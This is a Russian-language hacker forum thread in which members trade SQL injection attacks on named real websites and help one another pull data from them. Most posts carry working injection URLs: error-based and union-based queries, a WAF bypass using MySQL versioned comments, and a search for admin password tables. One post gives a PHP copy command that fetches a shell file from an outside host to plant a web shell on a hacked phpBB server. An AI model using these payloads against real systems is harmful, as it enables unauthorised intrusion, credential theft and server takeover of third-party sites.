Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    вот так попробывал
    когда видимо подобрал, вылетает

     
  2. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Code:
    http://rzd.sclub.ru/page.php?page=53'/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)+and+'1'='1
    Duplicate column name '5.0.87-log'
     
    3 people like this.
  3. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Короче, крутите как слепую.
     
  4. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    По поводу первого - начиная с пятой версии (5.0.какая то, не помню точно) мускула, нельзя оставлять комментарий открытым, а следовательно и использовать его не вариант.

    По поводу второго - очевидно, что если строка не обрубается комментарием -- 1, то значит запрос многострочечный.
    Решить это очень просто - обращаемся к той же таблице, что и первоначальный запрос, но колонки уже - произвольные данные. Далее используем where 1=1 or '1'='1 В результате вывод не будет зависеть от условия, а открытая кавычка закроется другой.

    Code:
    http://rzd.sclub.ru/page.php?page=53'+and+1=2+union+select+1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18+from+mobiticket.structure_page+where+1=1+or+'1'='1
    Обращение к другой таблице - через запятую:

    from mobiticket.structure_page, bla_bla_bla
     
    3 people like this.
  5. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Грей, ты мой Бог :(
     
  6. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Эм, а как там с лимитами?><
     
  7. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    Высший класс! Спасибо)
     
  8. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Или через where указывая номер записи или на месте выводимой колонки юзать подзапрос.

    P.S. но при желание можно и лимиты юзать, тогда еще одно объединение запроса нужно:

    Code:
    http://rzd.sclub.ru/page.php?page=53'+and+1=2+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18+from НУЖНА ТАБЛИЦА а тут лимиты))+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mobiticket.structure_page+where+'2'='1
     
    #12828 Grey, 10 May 2010
    Last edited: 10 May 2010
    4 people like this.
  9. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Огромное спасибо :)
     
  10. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    напримепь есть саыт xxx.com/news.php?id=2

    кояда зделаеш ххх.com/news.php?id=2

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'tw'' at line 1

    Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/twt/public_html/cp/lib/db.php on line 28


    а кояда ххх.com/news.php?id=2+union+select+0

    Forbidden

    You don't have permission to access /browse.php on this server.

    что зделать ?
     
  11. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    ххх.com/news.php?id=2/*!+union+select+0*/
    попробовать, это объод WAF
     
  12. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    http://oragir.am/news.php?id=13/*!+union+select+0*/
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ребят есть форум phpbb,сделал рестор базы из txt файла,но не могу загрузить шелл так как
    cmd=eval(file_get_contents( выдает error

    allow_url_fopen = on
    allow_url_include= off

    команды bash нормально работают,

    на сервере есть phpmyadmin,попробовал найти конфиг скрипты MySQL чтобы попасть в панель phpmyadmin,но ниче не нашел.

    есть идеи?
     
    _________________________
    #12833 Konqi, 10 May 2010
    Last edited: 10 May 2010
  14. AWD

    AWD New Member

    Joined:
    5 May 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Хелп! ...если это вообще возможно... :rolleyes:
    есть скуля:
    /?id='')or+(select+count(*)+from+information_schema.tables+group+by+concat((select+(concat(table_schema,':',table_name))+from+information_schema.columns+where+column_name+like+'%pass%'+limit+0,1),floor(rand(0)*2)))+--+

    имеем Duplicate entry 'a1323:tbladmin1' for key 1

    база a1323, табла tbladmin

    а тут:

    /?id='')UNION+SELECT*from+(SELECT+*+FROM+tbladmin+JOIN+tbladmin+b)a+--+

    выводит такую ошибку
    Table 'a1323.TBLADMIN' doesn't exist

    дело в том, что там id переводится в апперкейс.
    возможно ли как-то с этим бороться? хексы, чары и прочие известные мне приблуды в FROM не годятся. значит должны быть НЕизвестные...
    а? что скажете, господа :rolleyes:
     
  15. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    cmd=copy($_GET[aa],$_GET[bb]);&aa=http://you_site.ru/shell.txt&bb=путь куда заливать шелл
     
    2 people like this.
  16. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    не смог =(...
    http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777
     
  17. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    там походу нет инъекции.

    у меня тут тоже пару подсобралось
    http://www.colorlines.com/article.php?ID=681'
    http://thetvdb.com/index.php?tab=series&id=79771'
    http://www.worstpreviews.com/headline.php?id=15683

    не получилось раскрутить
     
  18. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2BrainDeaD
    http://www.colorlines.com/article.php?ID=681+and+substring(@@version,1,1)=4+--
    крути как блинд
     
    1 person likes this.
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    1)http://www.colorlines.com/article.php?ID=681+or+1=1+and+substring(version(),1,1)=4
    
    2) http://thetvdb.com/index.php?tab=series&id=79771+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
    
    3) http://www.worstpreviews.com/headline.php?id=15683+or+1=1+and+substring(version(),1,1)=5
    
     
    3 people like this.
  20. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    как бороться?
    limit , второй параметр...
     
Thread Status:
Not open for further replies.